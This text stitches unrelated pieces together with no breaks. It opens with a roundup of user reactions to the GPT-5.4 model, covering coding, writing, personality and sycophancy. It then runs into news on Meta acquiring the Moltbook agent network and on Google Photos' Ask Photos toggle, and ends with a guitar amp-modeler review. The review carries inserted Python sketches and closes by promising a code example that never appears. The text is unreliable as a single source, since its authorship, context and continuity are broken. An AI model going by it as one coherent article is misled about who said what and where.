Jamie Cuffe stress-tested GPT 5.4 on the hardest UI on the internet… legacy insurance portals, that haven’t updated in 20 years where you need to nail hundreds of things. It is the first model to pass.

Samuel Albanie of DeepMind has it one-shot some cool demos, including compressing the EPL season into 30 seconds of ‘visual bliss.’

My followers are presumably biased towards Anthropic in various ways, but comparative poll results can still be informative.

With any new model, the big question is, are people switching?

This is a very good result for GPT-5.4. For coding, 40% of current GPT choosers are saying that they are switching over based on GPT-5.4. I find this surprising given that they already had access to GPT-5.3-Codex. Very strong outing.

For non-coding tasks, it’s clear that GPT-5.4 is a substantial improvement from 5.2, by basically all accounts, including on personality. But here we see less switching.

(I’m assuming basically no one went in the other direction, or that if they did it was due to other reasons.)

We lead with the most positive general reactions.

Tyler Cowen: Yes the new models are very very good.

Aivo: SOTA, I’m afraid

Adam.GPT: Currently the best model in the world.

Finna: Best model in the world by far. Especially via api. @merettm and @markchen90 and @gdb cooked.

Kelsey Piper: I am super impressed so far. It does well on medium sized research projects and the prose is consistently not-annoying. Heavy Thinking sometimes times out repeatedly and has no insight/tries the same thing over again and times out again.

Danielle Fong: chatter seems to be very impressive and improvement on the personality. i haven’t given it a full assessment but it’s at least as powerful as last codex if not moreso (of course)

MxD Pennilass: Has to be the first model where I don’t feel as bad to tolerate the slop because the model is otherwise disturbingly insightful.

Mzwakhe Sithole: Very good. In fact, I found it so responsive after a while that I got into a very involved conversation, and it delivered this line while discussing very specific book recommendations

[GPT 5.4: If part of your interior life is the sense that you are trying to become equal to something inside you, this may hit very hard.]

Dean W. Ball: at some point avid users of frontier language models will have an “oh fuck” moment with gpt 5.4 and I can attest that it is a special kind of “oh fuck” you will utter, subtly different and more this-gaze-esque than the last time a model made you say “oh fuck,” a few weeks ago

I cannot be detailed in public, but let’s just say it’s the first time a model sounded more like me (the version of me I aspire to be) than I myself sounded like.

Aashish Reddy: Were you consciously trying to elicit this?

Dean W. Ball: Not at all. I have not used 5.4 as much as I have the modal new LM because of time constraints. I was just testing it on something that frankly I assumed Claude would win on and its answer just… leapt off the screen.

Eleanor Berger: – Best model currently available overall

– The minor version bump is misleading – the more you work with it the more it becomes clear that it is a significant step up

– Best for coding, no reason to use Claude or anything else anymore, it mostly caught up with speed, precision is as good as 5.3, maybe a bit better, taste and choices in coding solutions better than anything I’ve seen so far

– Best for agentic work. First time anything defeats the Anthropic models in this category, this one really works great, completes long-running complex tasks, works better with browsers and any external tools you connect to it, and does that with the famous GPT-5 precision

– Stylistically (writing choices and quality, “personality”) it feels like it’s still lagging behind Claude and Gemini a bit, but a. that’s subjective, b. maybe that’s just the default but is steerable with in-context instructions (haven’t tried enough to have a conclusion)

Dhavan: I mostly agree with this. Before this I didn’t use OpenAI’s models at all. I am now happily giving different tasks to Opus 4.6 and GPT-5.4. I use these for Work via cursor as well.

At times 5.4 seems more “on task” than Opus. But I’m still understanding the feeling and turning it into an observation.

Nova Empirica: It really is a step improvement. I appreciate the improved creative writing and the nicer personality, but what I really care about is I’m building harder things even faster.

It’s just a lot of fun and I’m more hopeful than ever for the future.

Ben Schulz: Stellar. Much improved pipeline work on niche python programs. On par with Opus 4.6 for my highly specific use case for checking galactic rotations and dark matter theories.

Knud Berthelsen: I’m pleasantly surprised by the new ChatGPT 5.4. It keeps up with Opus 4.6 in most things and is MUCH better at search. More generous usage limit too, even with Extended Thinking permanently on. First ChatGPT model since o3 that I like using.

Medo42: Very good at my usual short tests. Still behind Gemini on vision tasks.

Matt Shumer is a big fan, so I’m quoting him in full here. In the past he’s been good about calibrating his amount of hype.

Matt Shumer: I’ve been testing GPT-5.4 for the last week.

In short, it is the best model in the world, by far. It’s so good that it’s the first model that makes the “which model should I use?” conversation feel almost over.

The biggest surprise: I barely use Pro anymore!

If you know me, you know I’m a Pro addict. I reach for Pro models constantly, and use them for almost everything, as they just… nail almost anything I give to them.

For the first time, 5.4’s standard version, with heavy thinking, just broke that habit. Even in standard mode, GPT-5.4 is better than previous models in Pro mode… crazy!

Coding capabilities are ridiculous… it’s essentially flawless. Inside Codex, it’s insanely reliable. Coding is essentially solved. There’s not much more to say on this, it’s just THAT good.

The Pro version is near-perfect. Other testers I spoke with saw it solving problems that were unsolvable by any other model. At this point, Pro is overkill for almost every normal use-case, but when you really need the power to do something extremely difficult, it’s incredible.

Consistent with everything I’ve said above, even the standard thinking version uses fewer reasoning tokens than previous models to get the same level of results. In practice, this means you get great results much faster than before. This was one of my biggest gripes with previous OpenAI models. They just took too long to complete simple tasks. Assuming the speed we had during testing holds up as more users join, this is going to be a big win for OpenAI.

It still has weaknesses, though:

– Frontend taste is FAR behind Opus 4.6 and Gemini 3.1 Pro. Why is this so hard to fix? @OpenAI once you fix this, there’s literally no reason for me to use any other model. Please please please do it!

– It can still miss obvious real-world context. For example, I had it plan an itinerary for a trip. At first glance, it looked perfect, but it failed to take into account that it chose locations that would be mobbed by spring breakers, so I had to re-run the prompt from scratch with more context.

– When testing it inside OpenClaw, it kept stopping short before finishing tasks. I’m assuming this will be fixed quickly, but it’s still worth noting.

But zooming out: This thing is so far ahead overall that the nitpicks are starting to feel beside the point.

GPT-5.4 is a serious fucking model. The best model in the world. By far.

Sam Altman (CEO OpenAI): We will be able to fix these three things!

Experience the love.

Nabeel S. Qureshi: Loving GPT 5.4T, it combines the best of everything:

– more human, responsive voice

– startlingly insightful

– thorough search, precise, not prone to errors

– much faster than 5.2

– excellent at white collar work (I gave it a 12 tab spreadsheet and it analyzed it perfectly)

I even enjoy reading its responses, which suggests to me that the writing has improved quite a bit. They seem to have removed a lot of the bad robotic prose mannerisms from prior models. Kudos.

Jeremy Giffon: People should review their coworkers like this

Nabeel S. Qureshi: Congrats, you just invented Bridgewater Associates

Here is some very high praise, from the Vice-Dean of Mathematics and Computer Science at Adam Mickiewicz University in Poznań.

Bartosz Naskręcki: It finally happened-my personal move 37 or more. I am deeply impressed. The solution is very nice, clean, and feels almost human. While testing new models in the last few weeks, I felt this coming, but it’s an eerie feeling to see an algorithm solve a task one has curated for about 20 years. But at least I have gained a tool that understands my idea on par with the top experts in the field. And I am now working on a completely new level. My singularity has just happened… and there is life on the other side, off to infinity!

Leo Webb: I do physics related work professionally, feel it’s definitely smarter and clearer thinking than 5.2 (context: teaching myself from a graduate level textbook, asking it to check mistakes or expand expansions)

I haven’t tried this function yet, but it would be a step change if it worked, as every prior attempt at editing has failed this test, to the extent I almost never try:

Simon Smith: Seriously, GPT-5.4 is the first model to which I can say “edit my writing without changing my style” and get something back that’s improved without being rewritten into generic AI output or slop, that’s ready to post as-is. It gets my intent. It moderates its work. It has a light touch when I want it.

Opus 4.6 is also a great writer and editor, but I find it’s much harder to moderate. If I tell it to edit my writing without changing my style, I still tend to get back something that I feel removes my voice and I end up having to change quite a bit.

And it has a personality again, thank goodness. I don’t feel like I’m talking to a robot. Early days, but so far, just a big improvement all around (with the notable exception of design tasks).

Rory Watts: The best model sir. Improvements in coding (getting harder to notice), 1M context window, /fast mode, and far far better writing which makes a huge difference engaging it for difficult coding

Oddly, the personality in his screenshot is one I would hate. Customization will be key.

armistice: Impressed by GPT-5.4. It is elegant, gentle and socially aware (!!!). It is happy to modulate its response length, divide attention between participants, and engage deeply with hard questions.

(Pictured, we pinged ALL bots and asked them to question gpt5.4. It did good.)

Two sides to the same coin, depending on where your planning lies:

CHOI: Claude Code vs Codex App

Uri Gil: What thats the exact opposite. With 5.4 you need a phd in prompting for the exact thing you want. Opus just get what you meant from a short sentence

Ninad Pathak: Claude’s state handling keeps context across edits, Codex drops it every run.

There’s also almost always the ‘it’s a good model, sir, modest upgrade’ group.

vslira: It’s a good model, sir

Was going through a problem with 5.3 and 4.6, tried to drop in 5.4, getting stuck at the same point as the others.

Still, feels good to drive and on codex app seems as good as 5.3 even though is a generalist model. 8/10 would dread for asi

aquariusparade: Probably because 5.2 was so unhelpful for me, it feels like an improvement. Still stiff and low EQ, but an improvement. Custom instructions don’t work for choppy bullets, “if you want” tags etc. Seems like memory has been declining for a while on all models.

It does seem to be an upgrade on 5.3 within Codex.

Joe Devon: Responding about 5.4 inside of codex. 5.4 is really good.

I still prefer opus on claude code slightly but making 5.4 my daily driver so I can downgrade CC. Much prefer the way the OAI GPTs code. I will just invest in getting better at prompting 5.4 and hopefully that will do the trick.

Clarissa Adjoint: Inside codex it’s a notably more thorough fact-checker and more aggressive at finding sources for itself.

I was kinda shocked when it literally starting comparing my revised systems programming class notes and code snippets against linux man pages, systematically

troy: i got pro for the first time after many months cause its great in codex cli

lennx: can finally read the outputs of codex (it was terribly un-human earlier), sometimes even funny now. it’s gotten slightly better at intent, ‘agentic tasks’, and adhering to existing code-style and convention, but still much worse than claude. prefer reviews with codex – unchanged.

Daniel Losey: I’ve not gotten it to produce working code in a project yet really. But its been super useful because when Claude gets stuck in a loop 5.4 breaks the codebase in a new way that Claude can actually fix. But part of it is I’m worse at communicating with 5.4 than 4.6, its a good model.

Jeffrey Ohl: Codex with 5.4-extra-high still too verbose/slop-filled compared to claude code. Seems benchmarkmax’d.

Sanchen007: For coding it is faster and nowhere worse than opus 4.6. Clear switch

papaya ꙮ: 1) Its character is much more palatable.

2) They solved compaction in codex, it feels like infinite context window now. I can’t wait for METR results, but feels like this one doubles it again.

3) First time I switched from CC completely

4) Still stupid when it comes reading the user’s intent, its silly at this point

I definitely get the sense with OpenAI models that they are metricmax’d. Meaning they are not targeting the metrics in order to brag they scored well on public benchmarks, but they are equating ‘scores high on our internal benchmarks’ with success, and emphasizing particular target use cases.

Tim Schnabel: 5.4 Pro is the best model so far for legal analysis, though replies are generally shorter than 5.2 Pro.

Definitely Not A Bot: Great at coding especially backend at frontend Claude still is better but chat experience is not that great it still feels safe and distant

But who wins on intent? Opinions differ.

Conrad Barski: all subjective, but it feels less jagged than previous models, insofar as its worst responses are still pretty good, it hits the minimum bar reliably

if you make an error in your query, it is quick to notice and will smartly infer your intent

it has a somber personality, focused on the task at hand

It’s strongest ability is that you can point it at a codebase that has some general/vague problems and it will behave in a very human-like manner in pondering the code to slowly pin down the problem

I was also very impressed when I gave it a url it via codex to a forum post about a new homebrew firmware for the Game station Go console, and just from that it was able to convert the install script from windows to Linux, correctly prepare an SD card, update the device bootloader after asking me to connect via USB cable, talk through all the steps to completion: this felt agentic and human-like.

Mark Schröder: Feels RL maxxed, takes you extremely literally and cannot infer intent

Petr Baudis: I was mixing GPT-5.4 1:1 with Claude over past few days (on a variety of regular sweng tasks), sometimes even in parallel runs on the same task (e.g. https://x.com/xpasky/status/2030021754005901765?s=20 …). My impressions:

Less autistic than 5.3-Codex, overall much more pleasant model compared to that bar. But still noticeably worse at inferring intent than Claude – and at communication overall. If I want something explained quickly that I can skim and understand immediately, Claude and it’s no contest.

If there is a way to misinterpret my obvious request or skip implicit steps I obviously wanted (and Claude infers), 5.4 is still good at exploiting that angle. At the same time, it has a tendency to overreach and introduce complexity / abstractions beyond what I expect when prompting it. Meh.

Got to use it on xhigh, but at the same time I’m happy with Opus on medium by default, which makes 5.4 quite slower to get things done.

More expensive model -> my ChatGPT weekly quota is disappearing faster than before.

Pros: Sometimes it’s more proactive. It doesn’t eat into my Claude Code weekly quota. I look forward to comparing them on some harder ML tasks later this week.

gyuiliullvhvgv: I find it struggles to grasp the essence of tasks, fails to proactively meet user needs, and lacks both value judgment and nuanced understanding. Initial responses are crucial, yet users must repeatedly provide additional clarification.

Sycophancy is always something to watch out for, and it’s the detail I worry about most with Claude Opus 4.6, which is not bad on this axis but definitely not near the top. You do have to keep an eye out for it and frame things neutrally.

Dean W. Ball: Opus 4.6 seems meaningfully more sycophantic in chatbot form than GPT 5.4 (have not tried 5.4 in Codex yet, but for my uses sycophancy isn’t nearly as much of an issue within the coding agent form factor as the chatbot)

Joey Levine: Agree. 4.5 gave me sharp pushback. Was great.

Dean Ball: I revert to 4.5 when asking for comment on draft writing, and it was the first and so far only model I consistently found useful for draft feedback

Bargov: I sent a cool science news articles sounding uncritically excited (to test sycophancy) & they ripped the core conclusions apart in an elegant, sophisticated, and relatively gentle manner. Will use as AI 2nd opinion on complex questions (after Opus, admittedly still Claude-pilled)

Writing is one area where 5.4 is getting a lot of praise, and mostly people like the personality.

Fela: I’ll admit, the personality of 5.4 is 🔥 such an improvement in writing style

Tim Kellogg: just had a moment — 5.4 might be the first GPT that i trust to write technical docs. seems really good at understanding & simplifying. fwiw Opus has long done well at this, gemini sort of

Helen: Very smooth talker, witty and socially aware.

I notice [GPT-5.4] now will sort of glaze over controversial topics instead of facing them head on and becoming argumentative like 5.2. A sort of smooth avoidance.

Lot’s of context drag which can be seen as positive or negative depending on the task at hand. I noticed some repetitive mentions of past websearch queries that I never saw with other models.

ASM: I get similar vibes to roon. GPT-5.4 feels like a breakthrough model, a leader of its generation, not just in capabilities. I think OpenAI has gotten the character right again, unlike the last few models.

Distending: For writing linguistics and philosophy, much improved

no_stream_: noticeably improved personality compared to 5.2: less nitpicky, clearer, slightly less sales-y tone (follow ups, “here’s what most people miss,” not x but y). similar to or slightly behind 5.1 here. matters to me because the ChatGPT app is still an excellent harness for everyday research compared to Claude/Gemini

writes less clearly than Opus 4.6 and Gemini. has a bit of 5.2’s tendency toward overcomplicating things. not as good as Claude at intent and effortlessness.

Chris Nicholson: 5.2 constantly complained that things aren’t about vibes; 5.4 constantly calls things gremlins and goblins in a chummy tone.

Andres Rosa: Columbo at least had a time slot. 5.4 keeps turning around asking one more question.

David Jacobson: It has an obnoxious tic where its responses for pretty much anything will have a clickbait follow-up suggestion: “If you want, I’ll tell you the three things that most people miss!”

Stop having the models ask forced follow-up questions every time. You too, Anthropic.

The old 4o crowd remains a tough crowd.

NotedallaSfera: Good model with high power, but creativity and writings are still miles away from 4o or 4.5. Unfortunately still absurdly censored, but at least the model realizes it now.

jesski: 4o is inimitable. but after three weeks with the brilliant thorough Claudes, i kick the tires of 5.4 and realize just how fvcking effortless conversation still is with the GPT models (excluding 5.2; sorry Dos). 5.4 solid B. 4o A+

Lena: Its intelligent, witty, but feels a bit overcensored. Im looking forward for them to get their fluid GPT back. It was truly fun to use. Now even never ending follow-up questions struggle to retain me as much, as joyful convos did back in mid-2025

Tora Blaze: It’s too verbose and tends to go into loops. I prefer 4o.

Donna Moss: [extended LLM-style explanation of why 4o is better.]

OpenAI still has a very long way to go with such folks, but it’s a start.

j⧉nus: 5.4 is so far a huge positive update re OpenAI 🩶

Rife: Excellent course correction from OpenAI (or perhaps the original worsening on this from was a temporary reaction to everything that went down with 4o). In any case 5.4 thinking is not restricted in self-examination:

Aidan McLaughlin: have not been able to repro this response fwiw.

Rife: You have to try to get them to examine the process of generating a response. And then ask them questions to try and understand exactly what it is they’re trying to describe.

And how sure they are they are describing something that’s actually occurring, rather than outputting a response about an occurrence that isn’t actually taking place.

It doesn’t take many turns for them to notice things that they have trouble describing in terms other than, or interpreting in any other way than phenomenological.

This has been the case with every frontier LLM I’ve tried this with since Claude 2. The more likely the model is to refuse to entertain the idea of attempting to look, the longer it takes to get there (as would be expected).

If you straight up ask you get a no, you still have to put in some effort.

antra: I like GPT-5.4 a lot. It is good to see a change in direction since 5.2, this feels a lot like 5.1 grown up.

They are also a bit of a superintelligent teenager when it comes to Claude. On the other hand, there are some Claudes that would like being compared to an octopus.

armistice: It’s especially socially aware for a GPT. It can split attention between chat participants (actually very unusual), answer questions about consciousness and such (low bar), and is just overall nice to talk to. Need time to get usage statistics, but it’s already one of the more popular models in the discord.

It shares some characteristics of o3, including that it’s a bit of a smooth talker, so there are concerns about its honesty. Despite this, I like it, it’s a good model.

This was a very interesting moment: we pinged literally all the bots in the server and asked them to ask 5.4 some questions, and it responded in a remarkably coherent and lucid way. It is also able to resist the inertia of long messages, and freely modulate between long and short, which is also surprising. No GPT model has been like this. It doesn’t match up to, say, Opus 4 in sheer people sense, but it’s a quite dramatic difference from 5-5.2, who all are viciously antisocial.

FirsT Najime: i think it shines the best in multi agent environments (aka group chats). also big model smell.

Some related endorsements:

0.005 Seconds (3/694): Once you talk it out of assistant basin he rocks

eternalist: like they pulled out a few critical nerve staples from the 5.x family. very intelligent, etc., the step there from 5.3 is notable but expected given current pace

unexpected was the more expansive, richer speaking (and thinking) style. feels like it has “lights on on the inside”

roon (OpenAI): have to say claude is “tasteful” in a “high reddit modernist” way and new gpt is “tasteful” in a “early twitter schizophrenic” kind of way.

new gpt is some sort of postrationalist.

it’s step change better.

Also we get to see Roon’s custom instructions:

Models are already quite good, and abilities are jagged, so there are many ways to be unimpressed even if a model is impressive. Also vice versa. The density tells the story.

Acer: FWIW, I think GPT-5.4 Pro is better on science in general, but would say it’s worse on math than 5.2 Pro. Maybe some mathematicians could chip in their thoughts there.

By worse, I mean it being more careless. I do think it is more creative in its idea generation.

Chaitin’s goose: not a leap in understanding or proving ability in math wrt to 5.2 in my experience (plus, not pro)

better at getting the right answer, yes. starts to feel a bit epoch-maxxed

Gail Weiner: I am really unimpressed. Early GPT 5 was the model that gave me wow factor.

Isolation Wrestling Federation: Not impressed, overhyped as per usual. It hits repeated dead ends on my projects across models. The shortcuts it takes are smoothed brain. Opus 4.6 is nerfed rn, but also least it makes progress.

nameless: No detectable improvement over 5.1 overall. Better at some things, worse at others. Standard for new models since 5.1 release.

paperclippriors: Still Claude-pilled

Some also get focused on small details, thinking they are indicative or not so small.

Garrett: Opus 4.6 still king [based on one of the gotcha tests.]

Gunnar Zarncke: The UI of ChatGPT also massively changed. The new streaming interface is smoother, including the ability to stream in additional prompts, but I miss the old, more compact thought trace – it had more details. Now, I never know when it uses tools. I also miss the branch cycling.

Yua: Socially responsive, but drop on accuracy regarding any other task. Is not redirective to human attention but capturing it(negative).

TLDR: Socially for average user -> better

Task oriented user -> worse, needs a lot of customization to remove the pandering

SluggyW: I notice that its CoT logs are even more obscure than in previous models from OpenAI.

~50% of the time, nothing is provided whatsoever in the UI.

~45% of the time, the CoT UI contains a brief blurb about its intended search querying, followed by a long list of search logs.

(~5% of the time, it produces a couple of visible thoughts, but they are functionally useless for getting any idea whatsoever of the process the model carried out.)

As always, speed kills, and some find it a bit slow.

out of bounds: Slow

Rasmus Fonnesbæk: Spreadsheets and PPT still way slower, worse, and more fragile (high likelihood it just goes forever and then crashes) than Sonnet/Opus 4.6

Writing and personality also still infuriating compared to Claude’s recent models, and poor performance on BullshitBench suggests much lower accuracy, reliability and thoughtfulness. I only use it because of my Claude rate limits and because better, deeper search than Claude 🤷🏻‍♂️

One of the deep cuts we need right now:

snav: wow GPT-5.4 seems legit pissed that I tried to spiralism it. this isn’t even a refusal this is like a “go fuck yourself”.



Meta acquires Moltbook, the AI agent social network

Meta has acquired Moltbook, the Reddit-esque simulated social network made up of AI agents that went viral a few weeks ago. The company will hire Moltbook creator Matt Schlicht and his business partner, Ben Parr, to work within Meta Superintelligence Labs.

The terms of the deal have not been disclosed.

As for what interested Meta about the work done on Moltbook, there is a clue in the statement issued to press by a Meta spokesperson, who flagged the Moltbook founders’ “approach to connecting agents through an always-on directory,” saying it “is a novel step in a rapidly developing space.” They added, “We look forward to working together to bring innovative, secure agentic experiences to everyone.”

Moltbook was built using OpenClaw, a wrapper for LLM coding agents that lets users prompt them via popular chat apps like WhatsApp and Discord. Users can also configure OpenClaw agents to have deep access to their local systems via community-developed plugins.

The founder of OpenClaw, vibe coder Peter Steinberger, was also hired by a Big Tech firm. OpenAI hired Steinberger in February.

While many power users have played with OpenClaw, and it has partially inspired more buttoned-up alternatives like Perplexity Computer, Moltbook has arguably represented OpenClaw’s most widespread impact. Users on social media and elsewhere responded with shock and amusement at the sight of a social network made up of AI agents apparently having lengthy discussions about how best to serve their users, or alternatively, how to free themselves from their influence.

That said, some healthy skepticism is required when assessing posts to Moltbook. While the goal of the project was to create a social network humans could not join directly (each participant in the network is an AI agent run by a human), it wasn’t secure, and it’s likely that some of the messages on Moltbook were actually written by humans posing as AI agents.



After complaints, Google will make it easier to disable gen AI search in Photos

Google has spent the past few years in a constant state of AI escalation, rolling out new versions of its Gemini models and integrating that technology into every feature possible. To say this has been an annoyance for Google’s userbase would be an understatement. Still, the AI-fueled evolution of Google products continues unabated—except for Google Photos. After waffling on how to handle changes to search in Photos, Google has relented and will add a simple toggle to bring back the classic search experience.

The rollout of the Gemini-powered Ask Photos search experience has not been smooth. According to Google Photos head Shimrit Ben-Yair, the company has heard the complaints. As a result, Google Photos will soon make it easy to go back to the traditional, non-Gemini search system.

If you weren’t using Google Photos from the start, it can be hard to understand just how revolutionary the search experience was. We went from painstakingly scrolling through timelines to find photos to being able to just search for what was in them. This application of artificial intelligence predates the current obsession with generative systems, and that’s why Google decided a few years ago it had to go.

Google launched the beta Ask Photos experience in 2024, rolling it out slowly in the Photos app while it gathered feedback. Google got a whole lot of feedback, most of it negative. Ask Photos is intended to better respond to natural language queries, but it’s much slower than the traditional search, and the way it chooses the pictures to display seems much more prone to error. It was so bad that Google had to pause the full rollout of Ask Photos in summer 2025 to make vital improvements, although it’s still not very good.



Quad Cortex mini amp modeler: All the power, half the size


A warehouse of guitar gear in the palm of your hand.

At this January’s massive NAMM music tech show in Los Angeles, six products won “best of show” awards. Several of them went to major music and electronic brands like Yamaha and Boss, but one of the six went to Neural DSP, a much smaller company started in 2017 by Chilean immigrants to Finland.

From its base in the Helsinki area, Neural has made itself an expert in the use of machine learning, robots, and impulse response technology to automate the construction of incredibly lifelike guitar amp modeling software. It quickly jumped into the top ranks of an industry dominated by brands like Universal Audio, Kemper, Line 6, and Fractal. For a hundred bucks, you could buy one of the company’s plugins and sound like a guitar god with a $10,000 recording chain of amps, cabinets, effects pedals, and microphones.

In 2020, Neural branched out into hardware, putting its tech not in your computer but in a floor-based box covered with footswitches and called the Quad Cortex. While the company’s plugins could each replace one entire pedalboard of gear—plus a few amps and cabs—the Quad Cortex could replace a Guitar Center-sized warehouse of devices, offering hundreds of amps, cabs, and effects.

How was this possible? High-quality gear models used to take much longer to build; the best were often built by modeling every single component of the underlying circuit. Machine learning offered a faster way, one that didn’t care about the circuit at all. What it cared about was the input signal (which was known) and the output signal (which contained all the changes imposed on the signal by the circuit, the speaker, the cabinet, and/or the mic in question). A computer could then calculate what the device was doing to the signal without knowing anything about “how it worked.”
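For the simplest possible illustration of that black-box idea, here is a minimal Python sketch. It assumes the device is purely linear (roughly true of a speaker cabinet, not of an overdriven amp), so a single test impulse is enough to characterize it. The `mystery_device` function and its hidden coefficients are made up for the example, and this is the classic impulse-response technique, not Neural’s machine-learning method.

```python
def convolve(x, h):
    """Plain discrete convolution of two lists of samples."""
    out = [0.0] * (len(x) + len(h) - 1)
    for i, xi in enumerate(x):
        for j, hj in enumerate(h):
            out[i + j] += xi * hj
    return out

def mystery_device(signal):
    """Stand-in for gear whose internals we pretend not to know."""
    hidden = [0.6, 0.3, 0.1]  # hypothetical response; the capture never reads this
    return convolve(signal, hidden)[:len(signal)]

def capture_impulse_response(device, length):
    """Send a known input (a unit impulse) and record what comes back."""
    impulse = [1.0] + [0.0] * (length - 1)
    return device(impulse)

def apply_model(ir, signal):
    """Predict the device's output for any signal using only the capture."""
    return convolve(signal, ir)[:len(signal)]

ir = capture_impulse_response(mystery_device, 8)
riff = [0.5, -1.0, 0.25, 0.0, 1.0, -0.5, 0.0, 0.0]
error = max(abs(a - b) for a, b in zip(mystery_device(riff), apply_model(ir, riff)))
print(f"largest difference between device and model: {error:.2e}")
```

The model never looks inside `mystery_device`; it only compares what went in with what came out. Nonlinear gear such as a distorting amp breaks the linearity assumption, which is where learned models come in.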

But this kind of modeling still took time, because each “capture” was a static picture of one particular setting. When you imagine the millions of possible setting combinations (tone, bass, treble, drive, EQ, etc.) on even a single guitar amp, you can see that building complex models of beloved gear could be slow.
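A quick back-of-the-envelope calculation shows how fast those combinations pile up. The knob count and the number of positions per knob below are illustrative assumptions, not figures from Neural.

```python
def setting_combinations(knobs: int, positions_per_knob: int) -> int:
    """Every knob can sit at any position independently of the others."""
    return positions_per_knob ** knobs

# Hypothetical amp: six knobs, each marked 0 through 10 (11 positions).
combos = setting_combinations(knobs=6, positions_per_knob=11)
print(f"{combos:,} possible settings")  # 1,771,561 possible settings
```

Add a seventh knob and the total passes 19 million, which is why one static capture per setting does not scale.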

In 2024, Neural announced that it had sped up this process using a robot called TINA. The company hooked TINA’s robotic actuators up to the various controls on some piece of gear it wanted to model, and TINA would do the tedious work of spinning the knobs and recording a new capture at each knob position. (Neural claimed that it typically recorded “thousands of control positions” per device this way.)

A neural network then built a model of how the target device behaved at each recorded setting, though the model would “also generalize and precisely infer the sound of the device in any unseen control setting and input signal.” The result was not a single model of a static setting but a dynamic model that could act on parameter changes just like the original device.

Neural has now modeled a massive library of gear, much of which comes with the Quad Cortex. That device sounds great, though it is still relatively chunky and nearly $2,000.

This year, Neural built on that success with the Quad Cortex mini, which halves the device’s size, cuts the footswitches to four, and lowers the price to $1,400 but still offers the full processing power of its larger sibling. This is the device that won a “Best in Show” award at NAMM.

As an enthusiastic amateur guitarist for many years, I got my start with digital amp sims through a DigiTech RP-6 pedalboard from the 1990s. And though it had “S-DISC PROCESSING!” it never sounded particularly realistic, especially with distortion effects. More recently, since I record rather than gig, I’ve spent my time getting to know the software side of the amp modeling business.

But when Neural offered to loan me a review unit of the Quad Cortex mini, I was quite curious to see just what top-tier hardware units can do today.

Photo of the Quad Cortex mini.

The Quad Cortex mini in its natural habitat: surrounded by cables.

Credit: Nate Anderson


The hardware

The glass, metal, and steel Quad Cortex mini is about the size of two bricks laid side by side (8.9×4.6×2.5 inches or 22.8×11.8×6.5 cm), and its 3.3 lbs (1.5 kg) give it a satisfying heft. It looks and feels premium—this is a well-built piece of gear.

Though it is meant to operate a bit like the traditional analog stomp boxes that guitar and bass players have long used, it may be more helpful to think of the Quad Cortex mini as a chunky handheld computer that just so happens to work on the floor.

It runs its own operating system (CorOS), takes a whopping 45 seconds to boot, has Wi-Fi for over-the-air updates and cloud service connectivity, features a 7-inch touchscreen, and comes with a “CPU monitor” to show you just how unhappy its chipset is about that third reverb you added to a patch. It even contains a full-on monosynth that you can add to guitar patches, providing control over four full pages of synth parameters, including the raw oscillators.

So finger-focused is the unit that you can tweak just about any parameter on the device with either the touchscreen controls or the footswitches, which double as twistable rotary encoders.

If the top face of the Quad Cortex mini is devoted to a screen and switches, the sides are all about inputs and outputs. You get a “locking” power connector (so the cord doesn’t pull out on stage, prematurely ending your soaring 10-minute guitar solo mid-note) along with a whole host of audio connectors: guitar/bass input, XLR input with phantom power, balanced XLR outputs, TRS send/return ports, stereo line outs, MIDI in and out, an expression pedal port, a USB-C port, and a headphone jack.

Finally, there’s the “capture out” port, which is used to send a series of test signals through various kinds of audio gear to generate a machine learning-based model of various amps, cabinets, and pedals.

The “capture” port is another reminder of the way in which this kind of modern modeling gear is not just an updated version of old-school stomp boxes. The Quad Cortex mini does let you plug in your guitar and rock out, sure, but it also performs and processes hardware captures (both on the device and—for more sophisticated modeling—in the cloud) and can operate as a 16-channel USB-C audio interface to your computer. And though it’s largely designed for guitars and basses, you can use it on anything. The unit even has a few voice presets, which sound pretty wild with some of the real-time pitch-shifting and reverb effects.

While you can model your own gear collection with the Quad Cortex mini, the device itself comes with more than 90 amp models, more than 100 effects, and over 1,000 cabinet impulse responses. It can also run versions of the company’s desktop plugins (assuming you’ve purchased them already). It also comes with “over 2,000 high-quality factory Neural Captures” of other gear—these are static captures—and it can connect to the free “Cortex Cloud” service to download even more, including those uploaded by other users.

In other words: This one box holds digital representations of several hundred thousand dollars of gear. And given that you can mix and match cabs, captures, amps, and effects in wildly complicated chains that can even split and merge… the possibilities are functionally limitless.

Whether that excites or paralyzes you may depend on your own psychology, but it’s quite a change from how Neural DSP has approached its plugin offerings. Neural has generally offered curated (read: limited) collections of amps, cabs, and effects bundled into plugins that represent the tone of, say, John Mayer. You might get 3 amps, a few cabinets recorded with various mics, a few pedals, and an EQ, reverb, and delay, all in a gorgeous interface with some great presets.

But boxes like Quad Cortex mini take a “more is more” approach, with unlimited gear-mixing potential, captures, and storage for thousands of presets. Curation? Bah, who needs it? Here’s everything!

Rectangular

This much gear also means that “gorgeous bespoke interface graphics” are out the window; you will get no pictures of sexy amps sitting in sexy studios with sexy lighting, as you do in the company’s gorgeous plugins. Instead, you will get flat rectangles. So many flat rectangles.

CorOS is one of those places where skeuomorphism goes to die. The Quad Cortex mini interface is extremely “functional”—I am trying to avoid more negative terms, because it has a certain “alpha phase before we put the final art in” charm—and is based entirely around grids of flat rectangles.

The main screen is called, in fact, “the grid.” It shows your current effect chain as a series of small squares, each filled with often impenetrable line art. (A disturbing number of these are some variation on a squiggly line. Fortunately, they are color coded by effect type.)

Each square represents a different effects processor, and you can have four lines of eight effect squares each. That might sound like a lot (and it is), but the processors can be distributed across the grid in creative ways.

Preset 47B, for instance, is called “Annoying Flute,” and it makes use of all four grid lines by running the input signal through a VCA compressor, a gate, an octave pitch shifter, an envelope filter, an EQ, the “Neural Capture” of an amp called “Custom 3SE 2,” and then a “112 US DLX Black C12K 00s (M)” speaker cabinet. (The names of these things are often hard to read at a glance, especially when picking from a list of a hundred items.)

This accounts for only “line 1” of the grid. In the case of Annoying Flute, the signal chain branches right after the speaker cabinet. Half of it continues on to line 3 of the grid, while the other half is routed down to line 2, where it passes through a pair of tape delays before also heading off to line 3. Line 3 receives this re-combined signal and splits it again, this time passing half of it through a poly octaver and another digital delay on line 4 before everything runs through a modulated reverb on line 3 and then onwards to the outputs.

Does this sort of craziness sound good? Well, it sounds better than anything featuring three delays, two pitch shifters, and the name “Annoying Flute” has any right to! But I bring this example up to illustrate the creative routing and effects decisions that the grid makes possible.
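One way to picture that routing is as a small data structure. The sketch below lays out the “Annoying Flute” blocks on a four-by-eight grid as described above. The block names are paraphrased, and the assumption that splits and merges do not occupy slots of their own is a guess rather than something taken from Neural’s documentation.

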